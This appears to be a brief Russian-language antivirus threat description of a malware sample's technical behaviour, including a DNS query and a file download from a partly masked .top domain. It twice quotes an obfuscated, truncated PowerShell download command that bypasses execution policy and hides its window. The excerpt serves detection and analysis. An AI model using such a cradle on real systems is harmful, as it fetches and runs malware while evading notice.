Техническая информация
- http://to###ores.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwErsHE^ll.exe ^-e^xE^cut^i^O^npolI^c^Y^ BYPa^ss -^nOp^RO^F^ILE -w^in^doW^sT^YlE ^HI^Dden^ ^(ne^W-^O^BJEcT S^YStE^M^.^nET^.wEbC^li^ENt)^.DoWn^LoaDf^IL^E(^'http://to###ores...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "POwErsHE^ll.exe ^-e^xE^cut^i^O^npolI^c^Y^ BYPa^ss -^nOp^RO^F^ILE -w^in^doW^sT^YlE ^HI^Dden^ ^(ne^W-^O^BJEcT S^YStE^M^.^nET^.wEbC^li^ENt)^.DoWn^LoaDf^IL^E(^'http://to###ores...' (со скрытым окном)